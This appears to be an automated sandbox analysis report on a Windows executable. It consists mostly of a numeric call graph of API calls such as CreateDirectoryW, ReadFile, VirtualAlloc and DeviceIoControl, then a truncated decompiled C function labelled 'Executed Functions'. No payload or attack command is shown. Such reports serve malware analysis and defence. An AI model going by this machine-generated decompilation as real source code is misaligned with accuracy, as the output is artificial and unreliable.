52744->52735 52899 418554 52745->52899 52746->52130 52748 46c2a4 18 API calls 52747->52748 52749 46c568 52748->52749 52750 46c56e 52749->52750 52751 4704bb 31 API calls 52749->52751 52752 46c2f6 2 API calls 52750->52752 52751->52750 52753 46c591 52752->52753 52753->52130 52781 41692c __EH_prolog 52754->52781 52755 416a25 52757 4039c0 18 API calls 52755->52757 52756 416971 52762 408604 ctype 17 API calls 52756->52762 52758 416a46 52757->52758 52760 403532 18 API calls 52758->52760 52759 4169f5 52759->52755 52759->52756 52763 416a57 52760->52763 52761 401e9a 18 API calls 52761->52781 52764 416a0e 52762->52764 53341 417172 52763->53341 52764->52130 52766 4179f7 19 API calls 52766->52781 52769 416a15 52772 407a18 ctype 17 API calls 52769->52772 52774 416a1f 52772->52774 52773 407a18 ctype 17 API calls 52775 416a82 52773->52775 52776 408604 ctype 17 API calls 52774->52776 52777 407a18 ctype 17 API calls 52775->52777 52776->52764 52779 416a8e 52777->52779 52780 416b09 52779->52780 53365 409d7c 52779->53365 53400 411c21 52780->53400 52781->52755 52781->52756 52781->52759 52781->52761 52781->52766 52781->52769 52782 407a18 ctype 17 API calls 52781->52782 52785 415c6d 18 API calls 52781->52785 53523 4179e9 52781->53523 53526 408e6d 18 API calls 52781->53526 52782->52781 52785->52781 52787 416b3b 53408 4192f5 52787->53408 52789 416aa1 GetLastError 52791 416aad 52789->52791 52792 403532 18 API calls 52791->52792 52795 416abf 52792->52795 52793 416b68 52799 416bd4 52793->52799 52811 416b83 52793->52811 52794 416b4c 52796 407a18 ctype 17 API calls 52794->52796 52797 40b0a0 18 API calls 52795->52797 52817 416af6 52796->52817 52798 416ad1 52797->52798 52801 401e26 18 API calls 52798->52801 53439 4297ca 52799->53439 53477 4290c5 52799->53477 52800 40862d ctype 17 API calls 52802 416c07 52800->52802 52803 416ade 52801->52803 52805 408604 ctype 17 API calls 52802->52805 52806 407a18 ctype 17 API calls 52803->52806 52804 416bd2 52818 407cd5 33 API calls 52804->52818 52819 46c55c 33 API calls 52804->52819 52805->52774 52807 416ae6 52806->52807 52808 407a18 ctype 17 API calls 52807->52808 52813 416aee 52808->52813 52809 416be9 52814 407a18 ctype 17 API calls 52809->52814 52810 416bbe 52812 40c20f VariantClear 52810->52812 52811->52810 53527 40c5ad RaiseException ctype 52811->53527 52812->52804 52816 407a18 ctype 17 API calls 52813->52816 52814->52817 52816->52817 52817->52800 52818->52809 52819->52809 52822->52041 52823->52044 52824->52047 52825->52044 52827 4072ea 18 API calls 52826->52827 52828 4073ae 52827->52828 52828->52130 52829->52130 52830->52067 52831->52074 52832->52088 52833->52098 52834->52110 52835->52117 52836->52122 52837->52126 52840 40a296 __EH_prolog 52839->52840 52841 40a2b8 52840->52841 52842 40a39b 52840->52842 52844 40a2cd GetFullPathNameW 52841->52844 52846 401e9a 18 API calls 52841->52846 52929 401eee 18 API calls ctype 52842->52929 52848 40a2f3 52844->52848 52845 40a3ae 52930 409ad5 20 API calls 2 library calls 52845->52930 52846->52844 52847 40a396 52847->52703 52847->52704 52848->52847 52851 40a328 GetFullPathNameW 52848->52851 52853 401e9a 18 API calls 52848->52853 52857 40a343 52848->52857 52850 40a3bc 52931 40a20f 20 API calls 52850->52931 52851->52857 52853->52851 52854 40a3d0 52856 407a18 ctype 17 API calls 52854->52856 52858 40a3e4 52856->52858 52857->52847 52928 40a4a1 18 API calls 2 library calls 52857->52928 52859 40a3f9 52858->52859 52860 40a3e9 52858->52860 52932 40af39 18 API calls 52859->52932 52862 407a18 ctype 17 API calls 52860->52862 52862->52847 52863 40a407 52933 4098a8 20 API calls 52863->52933 52865 40a415 52866 407a18 ctype 17 API calls 52865->52866 52867 40a421 52866->52867 52934 40af18 18 API calls 52867->52934 52869 40a430 52935 4098a8 20 API calls 52869->52935 52871 40a43e 52872 407a18 ctype 17 API calls 52871->52872 52873 40a44a 52872->52873 52874 40b0a0 18 API calls 52873->52874 52875 40a45f 52874->52875 52876 401e26 18 API calls 52875->52876 52877 40a46b 52876->52877 52878 407a18 ctype 17 API calls 52877->52878 52879 40a473 52878->52879 52880 407a18 ctype 17 API calls 52879->52880 52881 40a47b 52880->52881 52882 407a18 ctype 17 API calls 52881->52882 52883 40a483 52882->52883 52884 407a18 ctype 17 API calls 52883->52884 52884->52847 52886 418e37 __EH_prolog 52885->52886 52887 401e26 18 API calls 52886->52887 52888 418e4c 52887->52888 52889 40b0a0 18 API calls 52888->52889 52890 418e59 52889->52890 52891 40b431 27 API calls 52890->52891 52892 418e68 52891->52892 52893 407a18 ctype 17 API calls 52892->52893 52894 418e7c 52893->52894 52895 418e96 52894->52895 52936 46b8f4 RaiseException 52894->52936 52896 40862d ctype 17 API calls 52895->52896 52898 418e9e 52896->52898 52898->52745 52923 41855e __EH_prolog 52899->52923 52900 401e26 18 API calls 52900->52923 52901 418814 52902 40c20f VariantClear 52901->52902 52914 41857a 52902->52914 52903 41898e 52905 40c20f VariantClear 52903->52905 52905->52914 52906 418801 53097 4039fa 17 API calls ctype 52906->53097 52909 4039fa 17 API calls 52909->52923 52910 4189b9 18 API calls 52910->52923 52912 418827 53098 4039fa 17 API calls ctype 52912->53098 52914->52706 52914->52707 52916 41886e 53099 4039fa 17 API calls ctype 52916->53099 52917 4188c7 53100 4039fa 17 API calls ctype 52917->53100 52921 41891f 53101 4039fa 17 API calls ctype 52921->53101 52922 418f34 18 API calls 52922->52923 52923->52900 52923->52901 52923->52903 52923->52906 52923->52909 52923->52910 52923->52912 52923->52914 52923->52916 52923->52917 52923->52921 52923->52922 52937 4183fd 52923->52937 52948 40c20f 52923->52948 52952 4179f7 52923->52952 52977 417bae 52923->52977 53096 417b16 VariantClear __EH_prolog 52923->53096 52925->52691 52926->52721 52927->52735 52928->52847 52929->52845 52930->52850 52931->52854 52932->52863 52933->52865 52934->52869 52935->52871 52936->52895 52938 418407 __EH_prolog 52937->52938 52939 418422 52938->52939 52940 418446 52938->52940 52941 4079f2 RaiseException 52939->52941 52943 4079f2 RaiseException 52940->52943 52944 418429 52940->52944 52941->52944 52942 417bae 107 API calls 52945 4184aa 52942->52945 52946 418452 52943->52946 52944->52942 52945->52923 52946->52944 52947 418486 GetLastError 52946->52947 52947->52945 52949 40c214 52948->52949 52950 40c24c 52949->52950 52951 40c235 VariantClear 52949->52951 52950->52923 52951->52923 52953 417a01 __EH_prolog 52952->52953 52954 417a40 52953->52954 52955 417a2d 52953->52955 52957 417a47 52954->52957 52958 417a56 52954->52958 52956 40c20f VariantClear 52955->52956 52961 417a39 52956->52961 52962 403593 18 API calls 52957->52962 52959 417a54 52958->52959 52960 417af4 52958->52960 52964 40c20f VariantClear 52959->52964 52963 40c20f VariantClear 52960->52963 52961->52923 52962->52959 52963->52961 52965 417a77 52964->52965 52965->52961 52966 401e26 18 API calls 52965->52966 52967 417a87 52966->52967 52968 417aab 52967->52968 52969 417ab6 52967->52969 52970 417ad9 52967->52970 52972 40c20f VariantClear 52968->52972 52973 4054fe 18 API calls 52969->52973 52970->52968 52971 417ac9 52970->52971 52974 40c20f VariantClear 52971->52974 52972->52961 52975 417abf 52973->52975 52974->52961 53102 4035f2 18 API calls 52975->53102 52979 417bb8 __EH_prolog 52977->52979 53103 408963 52979->53103 52981 401e9a 18 API calls 52983 417c00 52981->52983 52982 417c54 52984 417c70 52982->52984 52989 417c80 52982->52989 52983->52982 52987 4072c9 18 API calls 52983->52987 52985 415c6d 18 API calls 52984->52985 53030 417c7b 52985->53030 52986 417cd7 52988 418275 52986->52988 52991 408642 ctype 17 API calls 52986->52991 52996 417cf0 ctype 52986->52996 52990 417c3b 52987->52990 52994 408604 ctype 17 API calls 52988->52994 52989->52986 53001 415c6d 18 API calls 52989->53001 53155 408767 18 API calls 52989->53155 52995 401e26 18 API calls 52990->52995 52991->52996 52992 417d14 53008 40fa26 18 API calls 52992->53008 52993 417e00 52997 408604 ctype 17 API calls 52993->52997 52998 418292 52994->52998 53000 417c48 52995->53000 52996->52992 53004 417fba 52996->53004 53002 417e0c 52997->53002 53003 407a18 ctype 17 API calls 52998->53003 53005 407a18 ctype 17 API calls 53000->53005 53001->52989 53006 407a18 ctype 17 API calls 53002->53006 53007 41829a 53003->53007 53009 40fa26 18 API calls 53004->53009 53016 417fb5 53004->53016 53005->52982 53010 417e14 53006->53010 53011 407a18 ctype 17 API calls 53007->53011 53012 417d47 53008->53012 53013 417fff 53009->53013 53014 407a18 ctype 17 API calls 53010->53014 53015 417e1c 53011->53015 53019 417d58 53012->53019 53156 40fa74 53012->53156 53017 418028 53013->53017 53022 40fa74 5 API calls 53013->53022 53014->53015 53015->52923 53020 403532 18 API calls 53016->53020 53016->53030 53023 407a18 ctype 17 API calls 53017->53023 53018 408604 ctype 17 API calls 53024 4183e4 53018->53024 53028 407a18 ctype 17 API calls 53019->53028 53025 4180fe 53020->53025 53027 418024 53022->53027 53087 417d95 53023->53087 53029 407a18 ctype 17 API calls 53024->53029 53034 407a18 ctype 17 API calls 53025->53034 53027->53017 53060 41803f ctype 53027->53060 53031 417d85 53028->53031 53032 4183ec 53029->53032 53030->52988 53030->52993 53046 4182ae 53030->53046 53030->53087 53107 40d340 53030->53107 53113 43394a 53030->53113 53119 42b338 53030->53119 53149 42d57a 53030->53149 53036 408604 ctype 17 API calls 53031->53036 53033 407a18 ctype 17 API calls 53032->53033 53038 4183f4 53033->53038 53039 41811d 53034->53039 53035 417d9a 53040 40fa26 18 API calls 53035->53040 53036->53087 53037 4180b8 53041 407a18 ctype 17 API calls 53037->53041 53038->52923 53042 403532 18 API calls 53039->53042 53043 417dbb 53040->53043 53041->53016 53044 41812c 53042->53044 53047 417dd9 53043->53047 53080 417e32 53043->53080 53048 407a18 ctype 17 API calls 53044->53048 53045 418305 53049 40c20f VariantClear 53045->53049 53046->53045 53053 403593 18 API calls 53046->53053 53046->53087 53050 407a18 ctype 17 API calls 53047->53050 53048->53030 53054 418311 53049->53054 53051 417de4 53050->53051 53055 407a18 ctype 17 API calls 53051->53055 53052 417f4a 53056 417f72 53052->53056 53061 415c6d 18 API calls 53052->53061 53053->53045 53062 41832c 53054->53062 53069 418388 53054->53069 53057 417def 53055->53057 53058 40862d ctype 17 API calls 53056->53058 53059 408604 ctype 17 API calls 53057->53059 53063 417f7a 53058->53063 53059->52993 53060->53037 53160 408767 18 API calls 53060->53160 53061->53052 53064 403532 18 API calls 53062->53064 53068 407a18 ctype 17 API calls 53063->53068 53066 41833a 53064->53066 53067 403532 18 API calls 53066->53067 53070 418347 53067->53070 53072 417f99 53068->53072 53162 414f74 18 API calls 2 library calls 53069->53162 53161 414f74 18 API calls 2 library calls 53070->53161 53076 407a18 ctype 17 API calls 53072->53076 53073 415c6d 18 API calls 53073->53080 53075 4183af 53078 401e26 18 API calls 53075->53078 53079 417fa4 53076->53079 53077 41835e 53081 401e26 18 API calls 53077->53081 53082 4183bc 53078->53082 53083 408604 ctype 17 API calls 53079->53083 53080->53052 53080->53073 53084 41836b 53081->53084 53085 407a18 ctype 17 API calls 53082->53085 53083->53016 53086 407a18 ctype 17 API calls 53084->53086 53085->53087 53088 418373 53086->53088 53087->53018 53089 407a18 ctype 17 API calls 53088->53089 53090 41837b 53089->53090 53091 407a18 ctype 17 API calls 53090->53091 53091->53087 53096->52923 53097->52914 53098->52914 53099->52914 53100->52914 53101->52914 53102->52971 53105 408973 53103->53105 53104 4072c9 18 API calls 53106 408998 53104->53106 53105->53104 53106->52981 53108 40d34c 53107->53108 53109 40d355 53107->53109 53108->53109 53163 40ba47 53108->53163 53109->53030 53114 433954 __EH_prolog 53113->53114 53115 4079f2 RaiseException 53114->53115 53116 43395f 53115->53116 53117 433973 53116->53117 53169 42a3cd 53116->53169 53117->53030 53120 42b342 __EH_prolog 53119->53120 53121 40862d ctype 17 API calls 53120->53121 53122 42b364 53121->53122 53123 42d57a 23 API calls 53122->53123 53124 42b3b9 53123->53124 53125 42b3f3 53124->53125 53126 42b3c0 53124->53126 53127 401e9a 18 API calls 53125->53127 53187 42b501 17 API calls 2 library calls 53126->53187 53129 42b413 53127->53129 53183 42f024 53129->53183 53132 42b46b 53189 42eaec 18 API calls ctype 53132->53189 53133 42b42d 53135 407a18 ctype 17 API calls 53133->53135 53137 42b435 53135->53137 53136 42b472 53190 42eb2e 18 API calls ctype 53136->53190 53141 42b3cc 53141->53030 53150 42d58b 53149->53150 53154 40d340 3 API calls 53150->53154 53151 42d59f 53152 42d5af 53151->53152 53311 42d33c 53151->53311 53152->53030 53154->53151 53155->52989 53158 40fa88 53156->53158 53157 40fab7 53157->53019 53157->53035 53158->53157 53319 40d071 53158->53319 53160->53037 53161->53077 53162->53075 53164 40ba53 53163->53164 53165 40ba6f SetFilePointer 53163->53165 53164->53165 53166 40ba9d 53165->53166 53167 40ba93 GetLastError 53165->53167 53168 40d2c2 GetLastError 53166->53168 53167->53166 53168->53109 53170 42a3d7 __EH_prolog 53169->53170 53175 421886 53170->53175 53172 42a3ea 53179 425658 53172->53179 53176 421890 __EH_prolog 53175->53176 53177 425658 GetSystemInfo 53176->53177 53178 4218b8 53177->53178 53178->53172 53182 40c5f4 GetSystemInfo 53179->53182 53181 42567a 53181->53117 53182->53181 53184 42f02e __EH_prolog 53183->53184 53194 42ec5c 53184->53194 53187->53141 53189->53136 53195 42ec66 __EH_prolog 53194->53195 53237 42b5a9 53195->53237 53198 42ecab 53200 42ee08 53198->53200 53206 42ecfe 53198->53206 53215 42ed7c 53200->53215 53305 42d0f8 RaiseException ctype 53200->53305 53202 42b427 53202->53132 53202->53133 53203 42ee68 53203->53202 53204 40fa26 18 API calls 53203->53204 53206->53202 53208 40fac0 5 API calls 53206->53208 53208->53215 53215->53202 53236 40d340 3 API calls 53215->53236 53236->53203 53238 42b604 17 API calls 53237->53238 53239 42b5b1 53238->53239 53240 40862d ctype 17 API calls 53239->53240 53241 42b5bc 53240->53241 53242 40862d ctype 17 API calls 53241->53242 53243 42b5c7 53242->53243 53244 40862d ctype 17 API calls 53243->53244 53245 42b5d2 53244->53245 53246 40862d ctype 17 API calls 53245->53246 53247 42b5dd 53246->53247 53248 40862d ctype 17 API calls 53247->53248 53249 42b5e8 53248->53249 53249->53198 53304 42d0f8 RaiseException ctype 53249->53304 53304->53198 53305->53215 53312 42d346 __EH_prolog 53311->53312 53313 40fac0 5 API calls 53312->53313 53315 42d35f 53313->53315 53314 42d372 53314->53152 53315->53314 53316 40fa26 18 API calls 53315->53316 53318 42d398 ctype 53316->53318 53317 407a18 ctype 17 API calls 53317->53314 53318->53317 53323 40d07e 53319->53323 53320 40d21c 53327 40d284 53320->53327 53331 40bc85 53320->53331 53323->53320 53324 40ba47 2 API calls 53323->53324 53325 40d1f6 53323->53325 53326 40d0b3 53323->53326 53323->53327 53335 4585c0 53323->53335 53338 40bc58 ReadFile 53323->53338 53324->53323 53325->53320 53328 40ba47 2 API calls 53325->53328 53326->53158 53339 40d2c2 GetLastError 53327->53339 53328->53320 53332 40bc92 53331->53332 53340 40bc58 ReadFile 53332->53340 53334 40bca3 53334->53327 53336 4585c4 53335->53336 53337 4585c7 VirtualAlloc 53335->53337 53336->53323 53337->53323 53338->53323 53339->53326 53340->53334 53342 41717c __EH_prolog 53341->53342 53528 416fd3 53342->53528 53347 403532 18 API calls 53350 4171ab 53347->53350 53348 4039c0 18 API calls 53349 4171eb 53348->53349 53351 407a18 ctype 17 API calls 53349->53351 53352 40b0a0 18 API calls 53350->53352 53353 416a69 53351->53353 53354 4171bd 53352->53354 53361 416c31 53353->53361 53355 401e26 18 API calls 53354->53355 53356 4171ca 53355->53356 53357 407a18 ctype 17 API calls 53356->53357 53358 4171d2 53357->53358 53359 407a18 ctype 17 API calls 53358->53359 53360 4171de 53359->53360 53360->53348 53362 416a7a 53361->53362 53363 416c44 53361->53363 53362->52773 53363->53362 53549 416ca8 18 API calls 53363->53549 53366 409d86 __EH_prolog 53365->53366 53367 403532 18 API calls 53366->53367 53372 409d95 53367->53372 53368 4039c0 18 API calls 53382 409df5 53368->53382 53370 409ee0 53375 401e26 18 API calls 53370->53375 53371 409e0c GetLastError 53374 409e89 53371->53374 53371->53382 53372->53368 53373 409dd7 53372->53373 53378 407a18 ctype 17 API calls 53373->53378 53377 40351a 18 API calls 53374->53377 53386 409eed 53375->53386 53376 409f51 53380 407a18 ctype 17 API calls 53376->53380 53379 409e91 53377->53379 53398 409ecc 53378->53398 53381 40b431 27 API calls 53379->53381 53380->53373 53383 409ea0 53381->53383 53382->53370 53382->53371 53382->53376 53391 407399 18 API calls 53382->53391 53395 401e26 18 API calls 53382->53395 53399 407a18 ctype 17 API calls 53382->53399 53550 409ccb 53382->53550 53384 409ea4 53383->53384 53385 409ed4 53383->53385 53387 407a18 ctype 17 API calls 53384->53387 53389 407a18 ctype 17 API calls 53385->53389 53386->53376 53388 407399 18 API calls 53386->53388 53393 409ccb 25 API calls 53386->53393 53397 407a18 ctype 17 API calls 53386->53397 53390 409ebc 53387->53390 53388->53386 53389->53370 53392 407a18 ctype 17 API calls 53390->53392 53391->53382 53394 409ec4 53392->53394 53393->53386 53396 407a18 ctype 17 API calls 53394->53396 53395->53382 53396->53398 53397->53386 53398->52780 53398->52789 53399->53382 53401 411c7a 53400->53401 53402 40862d ctype 17 API calls 53401->53402 53403 411cc3 53402->53403 53404 409500 18 API calls 53403->53404 53405 411ccd 53404->53405 53406 401e26 18 API calls 53405->53406 53407 411ce0 53406->53407 53407->52787 53409 4192ff __EH_prolog 53408->53409 53410 4079f2 RaiseException 53409->53410 53437 416b45 53409->53437 53417 419356 53410->53417 53411 419455 53413 41948c 53411->53413 53414 415c6d 18 API calls 53411->53414 53412 4039c0 18 API calls 53412->53417 53418 4194f1 53413->53418 53419 4194ab 53413->53419 53414->53411 53417->53411 53417->53412 53428 407399 18 API calls 53417->53428 53434 401e26 18 API calls 53417->53434 53436 40c20f VariantClear 53417->53436 53438 407a18 17 API calls ctype 53417->53438 53573 40c13b VariantClear 53417->53573 53574 419556 SysAllocString VariantClear RaiseException 53417->53574 53575 406796 18 API calls __EH_prolog 53417->53575 53576 40c068 VariantClear VariantCopy RaiseException 53417->53576 53420 408604 ctype 17 API calls 53418->53420 53421 408604 ctype 17 API calls 53419->53421 53422 4194f6 53420->53422 53424 4194b0 53421->53424 53426 41950b 53422->53426 53577 40ed6c 18 API calls ctype 53422->53577 53427 40862d ctype 17 API calls 53424->53427 53430 40862d ctype 17 API calls 53426->53430 53431 4194c3 53427->53431 53428->53417 53432 41951e 53430->53432 53433 408604 ctype 17 API calls 53431->53433 53435 408604 ctype 17 API calls 53432->53435 53433->53437 53434->53417 53435->53437 53436->53417 53437->52793 53437->52794 53438->53417 53457 429306 53439->53457 53440 42932b 53443 429925 17 API calls 53440->53443 53441 429360 53578 429925 53441->53578 53442 4079f2 RaiseException 53442->53457 53444 42927f 53443->53444 53446 40862d ctype 17 API calls 53444->53446 53449 429287 53446->53449 53451 408604 ctype 17 API calls 53449->53451 53454 429293 53451->53454 53453 429429 53455 429925 17 API calls 53453->53455 53454->52804 53456 42945a 53455->53456 53458 40862d ctype 17 API calls 53456->53458 53457->53440 53457->53441 53457->53442 53457->53453 53462 429660 53457->53462 53463 42956b 53457->53463 53464 42a381 73 API calls 53457->53464 53467 4295ed 53457->53467 53471 4296d5 53457->53471 53588 42a06f 53457->53588 53592 4264f7 53457->53592 53731 429f42 RaiseException __EH_prolog 53457->53731 53460 42946d 53458->53460 53461 408604 ctype 17 API calls 53460->53461 53461->53454 53465 429925 17 API calls 53462->53465 53466 429925 17 API calls 53463->53466 53464->53457 53468 4295a6 53465->53468 53466->53468 53469 429925 17 API calls 53467->53469 53470 40862d ctype 17 API calls 53468->53470 53469->53468 53472 4295b9 53470->53472 53473 429925 17 API calls 53471->53473 53474 408604 ctype 17 API calls 53472->53474 53475 429713 53473->53475 53474->53454 53732 4299b8 17 API calls 2 library calls 53475->53732 53478 4290cf __EH_prolog 53477->53478 53481 42925f 53478->53481 53483 4299f0 18 API calls 53478->53483 53488 408604 17 API calls ctype 53478->53488 53521 429122 53478->53521 54397 4298b3 18 API calls __EH_prolog 53478->54397 54398 429826 53478->54398 54402 43ac2f 18 API calls 53478->54402 53479 429274 53482 40862d ctype 17 API calls 53479->53482 53481->53479 53485 4079f2 RaiseException 53481->53485 53484 429287 53482->53484 53483->53478 53486 408604 ctype 17 API calls 53484->53486 53507 4292c5 53485->53507 53486->53521 53488->53478 53490 42932b 53493 429925 17 API calls 53490->53493 53491 429360 53494 429925 17 API calls 53491->53494 53492 4079f2 RaiseException 53492->53507 53493->53479 53495 42937b 53494->53495 54403 4299b8 17 API calls 2 library calls 53495->54403 53498 42a06f 73 API calls 53498->53507 53499 429429 53500 429925 17 API calls 53499->53500 53501 42945a 53500->53501 53502 40862d ctype 17 API calls 53501->53502 53504 42946d 53502->53504 53503 4264f7 106 API calls 53503->53507 53505 408604 ctype 17 API calls 53504->53505 53505->53521 53506 42a381 73 API calls 53506->53507 53507->53490 53507->53491 53507->53492 53507->53498 53507->53499 53507->53503 53507->53506 53508 429660 53507->53508 53510 42956b 53507->53510 53512 4295ed 53507->53512 53516 4296d5 53507->53516 54404 429f42 RaiseException __EH_prolog 53507->54404 53509 429925 17 API calls 53508->53509 53513 4295a6 53509->53513 53511 429925 17 API calls 53510->53511 53511->53513 53514 429925 17 API calls 53512->53514 53515 40862d ctype 17 API calls 53513->53515 53514->53513 53517 4295b9 53515->53517 53518 429925 17 API calls 53516->53518 53519 408604 ctype 17 API calls 53517->53519 53520 429713 53518->53520 53519->53521 54405 4299b8 17 API calls 2 library calls 53520->54405 53521->52804 53524 417975 VariantClear 53523->53524 53525 4179f4 53524->53525 53525->52781 53526->52781 53527->52810 53531 416feb 53528->53531 53529 41700a 53530 401e9a 18 API calls 53529->53530 53532 417008 53530->53532 53531->53529 53533 416fff 53531->53533 53535 416e2c 53532->53535 53545 417024 18 API calls 2 library calls 53533->53545 53540 416e36 __EH_prolog ctype 53535->53540 53536 416ead 53547 416f4a 18 API calls 2 library calls 53536->53547 53537 407399 18 API calls 53537->53540 53539 416eba 53541 416ebe 53539->53541 53548 416f4a 18 API calls 2 library calls 53539->53548 53540->53536 53540->53537 53540->53541 53542 407a18 ctype 17 API calls 53540->53542 53546 416ede 18 API calls 2 library calls 53540->53546 53541->53347 53541->53360 53542->53540 53545->53532 53546->53540 53547->53539 53548->53541 53549->53363 53551 409cd5 __EH_prolog 53550->53551 53552 409d07 CreateDirectoryW 53551->53552 53553 409ce7 53551->53553 53555 409d19 GetLastError 53552->53555 53570 409d15 53552->53570 53571 409ad5 20 API calls 2 library calls 53553->53571 53556 409d26 53555->53556 53555->53570 53558 401e9a 18 API calls 53556->53558 53557 409cf1 53572 409cbc CreateDirectoryA 53557->53572 53560 409d39 53558->53560 53562 40b863 19 API calls 53560->53562 53561 409cf8 53563 407a18 ctype 17 API calls 53561->53563 53564 409d46 53562->53564 53565 409d02 53563->53565 53566 409d62 53564->53566 53567 409d4a CreateDirectoryW 53564->53567 53565->53570 53569 407a18 ctype 17 API calls 53566->53569 53568 407a18 ctype 17 API calls 53567->53568 53568->53565 53569->53570 53570->53382 53571->53557 53572->53561 53573->53417 53574->53417 53575->53417 53576->53417 53577->53426 53579 42992f __EH_prolog 53578->53579 53580 40862d ctype 17 API calls 53579->53580 53581 429953 53580->53581 53582 408604 ctype 17 API calls 53581->53582 53583 42995e 53582->53583 53584 408604 ctype 17 API calls 53583->53584 53585 429984 53584->53585 53733 423635 17 API calls 2 library calls 53585->53733 53587 42937b 53730 4299b8 17 API calls 2 library calls 53587->53730 53589 42a098 53588->53589 53734 42a237 53589->53734 53593 426501 __EH_prolog 53592->53593 54179 42cd7d 53593->54179 53595 426646 54196 427107 53595->54196 53598 4079f2 RaiseException 53601 426519 53598->53601 53601->53595 53601->53598 53699 426bfc 53601->53699 54243 424385 18 API calls __EH_prolog 53601->54243 53699->53457 53730->53454 53731->53457 53732->53454 53733->53587 53735 42a23a 53734->53735 53736 42a0b3 53735->53736 53739 42a0b8 53735->53739 53748 42a1fa 43 API calls 53735->53748 53736->53457 53740 42a0c2 __EH_prolog 53739->53740 53749 411ed0 53740->53749 53756 40bd37 53740->53756 53759 412027 53740->53759 53741 42a10f 53742 42a116 53741->53742 53743 407cd5 33 API calls 53741->53743 54075 4019fe 53741->54075 53742->53735 53743->53742 53748->53735 53750 401e26 18 API calls 53749->53750 53754 411ee2 53750->53754 53751 411f14 53751->53741 53752 4054fe 18 API calls 53752->53754 53753 405529 18 API calls 53753->53754 53754->53751 53754->53752 53754->53753 53755 409ccb 25 API calls 53754->53755 53755->53754 54083 40b8bf 53756->54083 53760 412031 __EH_prolog 53759->53760 53761 401e9a 18 API calls 53760->53761 53762 4120aa 53761->53762 53763 4179f7 19 API calls 53762->53763 53764 4120bf 53763->53764 53765 4179e9 VariantClear 53764->53765 53797 4120c3 53764->53797 54076 401a0c 54075->54076 54084 40b8c9 __EH_prolog 54083->54084 54085 40b931 54084->54085 54086 40b8da 54084->54086 54087 40b9c0 FindCloseChangeNotification 54085->54087 54088 403532 18 API calls 54086->54088 54089 40b938 54087->54089 54090 40b8e5 AreFileApisANSI 54088->54090 54091 40b9a3 54089->54091 54092 40b93c CreateFileW 54089->54092 54093 40822f 19 API calls 54090->54093 54091->53741 54092->54091 54180 42cd87 __EH_prolog 54179->54180 54195 42cf33 54180->54195 54261 42cfaa 18 API calls ctype 54180->54261 54182 42cdcf 54184 42cf8d 54182->54184 54262 42cfaa 18 API calls ctype 54182->54262 54186 408604 ctype 17 API calls 54184->54186 54185 42ce44 54187 408604 ctype 17 API calls 54185->54187 54186->54195 54189 42ce50 54187->54189 54188 42cee6 54192 408604 ctype 17 API calls 54188->54192 54189->54188 54191 415c6d 18 API calls 54189->54191 54190 42ce20 54190->54184 54190->54185 54191->54189 54195->53601 54263 4271d5 54196->54263 54243->53601 54261->54182 54262->54190 54264 40862d ctype 17 API calls 54263->54264 54265 4271dd 54264->54265 54266 40862d ctype 17 API calls 54265->54266 54267 4271e5 54266->54267 54397->53478 54399 42983b 54398->54399 54401 429835 54398->54401 54399->54401 54406 46b8f4 RaiseException 54399->54406 54401->53478 54402->53478 54403->53521 54404->53507 54405->53521 54406->54401 54407->51859 54408 46e6aa SetUnhandledExceptionFilter 54409 41c10c 54410 41c116 __EH_prolog 54409->54410 54419 41c139 54410->54419 54430 4152b6 18 API calls 54410->54430 54412 41c19d 54413 407a18 ctype 17 API calls 54412->54413 54414 41c1bd 54413->54414 54415 41c20d 54414->54415 54416 41c1dd 54414->54416 54414->54419 54417 4079f2 RaiseException 54415->54417 54418 4079f2 RaiseException 54416->54418 54420 41c214 54417->54420 54418->54419 54431 41528b 18 API calls 54420->54431 54422 41c251 54432 40cf50 54422->54432 54425 41c267 GetLastError 54428 41c282 54425->54428 54426 41c29f 54427 407a18 ctype 17 API calls 54426->54427 54427->54419 54429 407a18 ctype 17 API calls 54428->54429 54429->54419 54430->54412 54431->54422 54435 40bc29 54432->54435 54438 40bbf0 54435->54438 54439 40b8bf 25 API calls 54438->54439 54440 40bc0d 54439->54440 54443 40bacb 54440->54443 54442 40bc21 54442->54425 54442->54426 54444 40bae1 54443->54444 54448 40bb15 54443->54448 54445 40baec DeviceIoControl 54444->54445 54444->54448 54446 40bb23 DeviceIoControl 54445->54446 54445->54448 54447 40bb3d DeviceIoControl 54446->54447 54446->54448 54447->54448 54448->54442

                                                                      Executed Functions

                                                                      Function 00403A70 Relevance: 46.7, APIs: 3, Strings: 23, Instructions: 1177COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 89%
                                                                      			E00403A70(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t502;
				signed int _t503;
				signed char _t504;
				signed int _t507;
				signed int _t508;
				char _t517;
				signed int _t518;
				signed int _t534;
				signed int _t549;
				signed int _t554;
				signed int _t569;
				void* _t571;
				void* _t574;
				void* _t577;
				signed int _t583;
				void* _t598;
				signed int _t614;
				signed int _t625;
				signed int _t626;
				signed int _t642;
				signed int _t647;
				signed int _t648;
				intOrPtr* _t676;
				void* _t689;
				signed int _t706;
				intOrPtr* _t720;
				signed int _t725;
				void* _t729;
				signed int _t730;
				signed int _t739;
				signed int _t757;
				signed int _t764;
				signed int _t769;
				signed int _t784;
				unsigned char _t786;
				signed char _t787;
				signed int _t788;
				signed char _t792;
				signed int _t793;
				signed int _t794;
				signed int _t809;
				signed int _t812;
				signed int _t815;
				intOrPtr _t829;
				intOrPtr _t861;
				signed int _t918;
				intOrPtr _t996;
				signed int _t1065;
				signed int _t1066;
				signed int _t1068;
				signed int _t1069;
				signed int _t1070;
				signed int _t1071;
				char* _t1073;
				signed int _t1075;
				char* _t1079;
				void* _t1081;
				void* _t1083;
				void* _t1084;

				E0046B890(E00473088, _t1081);
				_t1084 = _t1083 - 0x36c;
				_push(__ebx);
				SetFileApisToOEM();
				E00405B9F(_t1081 - 0x4c);
				 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
				_t1075 = 0;
				 *(_t1081 - 4) = 0;
				E00403532(_t1081 - 0x2c, GetCommandLineW());
				_t1049 = _t1081 - 0x4c;
				 *(_t1081 - 4) = 1;
				E00406C53(_t1081 - 0x2c, _t1081 - 0x4c);
				 *(_t1081 - 4) =  *(_t1081 - 4) & 0x00000000;
				E00407A18( *((intOrPtr*)(_t1081 - 0x2c)));
				if( *((intOrPtr*)(_t1081 - 0x44)) != 1) {
					E004036D9(__ebx, _t1081 - 0x4c, 0, 0, 1);
					E00404C12(_t1081 - 0x2d8);
					 *(_t1081 - 4) = 3;
					E0040FEC3(_t1081 - 0x7c);
					_push(_t1081 - 0x2d8);
					_push(_t1081 - 0x4c);
